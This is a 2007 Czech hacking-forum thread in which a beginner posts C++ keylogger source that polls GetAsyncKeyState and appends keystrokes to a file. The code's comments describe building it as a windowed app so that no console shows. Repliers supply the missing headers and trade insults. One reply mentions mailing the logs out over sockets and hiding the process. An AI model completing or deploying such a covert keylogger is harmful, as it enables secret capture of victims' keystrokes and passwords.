C++ příklad

HackForum

C++ příklad #
Prosím, jaké knihovny by se měly doplnit do tohoto skriptu : tipuju jen windows.h

#include #
#include #



using namespace std;//Datovy typ string se nam bude hodit

void klavesa(int key){
string prd;
ofstream out(".\\key.txt",ios::app);//oteviram datovy stream pro zapis na konec souboru
prd = vkctostring(key);//konvertuju virtual key code klavesy do rozumneho tvaru(slovni chrakterizaci klavesy ci odpovidajici ascii hodnoty)
out << prd;//zapisuji do streamu
}

int WINAPI WinMain (HINSTANCE instance, HINSTANCE previous, LPSTR commandline, int show)//Psano jako winaplikace, dos prompt okno na nenapadnosti neprida
{
int key;
while(1){ //nekonecne cyklim
for(key=8;key<=190;key++){//projizdim vsechny myslitelne keykody
if (GetAsyncKeyState(key) == -32767)klavesa(key);//kdyz je stlacena klavesa s dannym keycodem predaam ho funkci klavesa() pro dalsi zpracovani
}
}
return (0);
}

(odpovědět)
Měsíc | 85.207.199.*26.11.2007 9:38
re: C++ příklad #
1) ten zdrojak prepis, protoze to je hrozna prasarna
2)windows.h
3)string
4)kdyby jsi nebyl idiot, das tam iostream a nemusis se zbytecne srat s kravinama a usetril by jsi par radku.

----------
Frontis nulla fides.
(odpovědět)
Neuro | E-mail26.11.2007 11:35
re: C++ příklad #
Idiot nejsem, našel jsem si už přepsanej (tenhle je odsud s user texts a jinak chápej, že se teprve učím.
(odpovědět)
Měsíc | 85.207.199.*26.11.2007 12:14
re: C++ příklad #
Je rozdíl dívat se, jak to dělají jiní, a obšlehávat.
Jinak nechápu, proč to prostě nezkusíš zkompilovat. Pokud windows.h stačí, tak se přeloží, pokud nestačí, dozvíš se to. Na co se ptát?
(odpovědět)
gugumaa | 195.113.79.10/10.0.10.*26.11.2007 13:50
re: C++ příklad #
windows.h - je jasný.

string - používáš objekt string!

fstream - používáš objekt ofstream!


... a pokud můžu poradit, prvně si přečti něco o těch objektech, který ve zdrojáku používáš (string, ofstream)a pak je tam používej :-) něco jako v který hlavičkový soubor kvůli nim potřebuješ je to nejzákladnejší...

----------
Get enlightened!
(odpovědět)
mr.Crow | E-mail | Website26.11.2007 14:38
re: C++ příklad #
jak sluduju uzivatele "Měsíc" tak je to peknej debil , otazky tohoto typu mi lezou na nervy..
(odpovědět)
Aton | Website26.11.2007 15:35
re: C++ příklad #
Díky, srry, že nejsem tak "chytrej jako ty" .. hodnotit, tě nebudu, ale věř, že mě zas lezou na nervy odpovědi typu co zde tlačíš ty.
(odpovědět)
Měsíc | 85.207.199.*26.11.2007 18:41
re: C++ příklad #
Mesic: jo, treba se teprve ucis, ale mel by jsi se zamyslet nad tim, zda-li by nebylo lepsi se C++ teprve naucit a az pak se do neceho poustet. Navic te nechapu. V jednom dotazu se ptas na SQL injection a ve druhem se ptas na tohle. Zamer se na jednu vec. Navic nemas pravo se tady rozcilovat. Kdyz te nekdo posle do /dev/null, tak se nediv. Tohle jsou dementni dotazy, na ktere ti odpovi strejda google behem deseti vterin. Nauc se hledat a pak se ptej. Pokud napises, ze uz jsi hledal, tak hledat neumis.

----------
Frontis nulla fides.
(odpovědět)
Neuro | E-mail26.11.2007 18:51
re: C++ příklad #
Naučit se číst je základní věc cituji myslím, ze 3 příspěvku : našel jsem si už přepsanej ...
hledat umím, hold až potom co něco plácnu, ale reakce jaký zde byly to je slabě přes 256 ..
(odpovědět)
Měsíc | 85.207.199.*26.11.2007 19:34
re: C++ příklad #
Atone premyslej nad tim co rikas. Ne kazdy je dokonaly jako ty. bohuzel ...
(odpovědět)
sLa | 89.103.37.*26.11.2007 20:22
re: C++ příklad #
Měsíc: ano, našel sis už přepsanej, ale chce to hledat dál (např. ty knihovny: když kompiluješ, tak ti to hodí error u nějakého fce - hned máš bod pro hledání)...když máš pocit, že pořádně nezvládáš, není hamba si pročíst tutoriály

(odpovědět)
Rift_ | 212.96.190.*26.11.2007 21:10
re: C++ příklad #
Do těch usertext jsem daval tuhle cast kodu : while(1){ //nekonecne cyklim
for(key=8;key<=190;key++){//projizdim vsechny myslitelne keykody
if (GetAsyncKeyState(key) == -32767)

Ovsem ted je trochu upravena .. Nemyslim , ze moc povedene , je to cast zdrojaku z Irongeek ;)
Navazovala na ni cast s rozhodně bych řekl jednodušším zapisováním do souboru a posláním na mail pomocí socketů. Do WinApi to sice mas prepsany ale to DOS prompt okno bylo dle me lepsi , jelikoz bylo zneviditelnene ;) Ovsem nekoukal jsem jestli je videt ve vypisu procesu :( Se jeste podivam.. To by se ale urcite taky dalo poresit;)

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail28.11.2007 9:06
re: C++ příklad #
OT: zamysli se nad temi komentari v kodu...
"nekonecne cyklim"
(odpovědět)
HC | 90.183.61.*28.11.2007 12:41
re: C++ příklad #
komentare si doplnil Měsíc... ty tam nebyly ;) ja se ridil komenty v aj

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail29.11.2007 10:25
re: C++ příklad #
necetl jsem vsechny prispevky protoze vase arogantni komentare jsou tak akorat abyste nasrali co nejvic lidi....jen jsem chtel toto, mozna to nekde vys je :

Měsíc : Woe,jestli neumis ani doplnit spravny knihovny/zkompilovat a nerika ti nic "vyvojovy cyklus" tak se vrat uplne na zacatek a zacni s tema nejjednodusima prikladama, ciste jen konsolovy aplikace kde ti staci naincludovat iostream... ;)
(odpovědět)
cP | 213.250.246.*28.11.2007 16:01
re: C++ příklad #
samozřejmě, že jsem se za ty 4 dny toho naučil habaděj : strukturu knihoven , cykly a pokročilé základy konzolových aplikací ;) , vidíte stačí člověka nakopnout ;ú
(odpovědět)
Měsíc | 85.207.199.*28.11.2007 16:37
re: C++ příklad #
ROFL tomu rikas "skript"? Tohle je C++ tyve.
(odpovědět)
Harvie. | 213.220.241.*28.11.2007 20:04
re: C++ příklad #
Jen tak bokem tohle není můj "skript" to je skriptík, který zde publikujete vy ;) viz sekce user text, tak nadávání do lam si laskavě nechte pro sebe ;)
(odpovědět)
Měsíc | 85.207.199.*28.11.2007 21:40
re: C++ příklad #
Měsíc: do user text může přispět kdokoliv, když se tam objeví něco, tak za to nemůžou všichni :)
(odpovědět)
Rift_ | 212.96.190.*29.11.2007 7:17
re: C++ příklad #
Měsic: hm, 4 dny...az v tom budes delat 4 roky, mozna uz i neco naprogramujes a ten kod nebude hrozna prasarna. A mozna, ze se i naucis includovat i nejake knihovny ;)

----------
Frontis nulla fides.
(odpovědět)
Neuro | E-mail29.11.2007 20:38
re: C++ příklad #
se stalo ... stačí chtít ;) viz .. Mistrovství v c++ a Myslíme v c
(odpovědět)
Měsíc | 85.207.199.*30.11.2007 18:01

Zpět
 
 
 

 
BBCode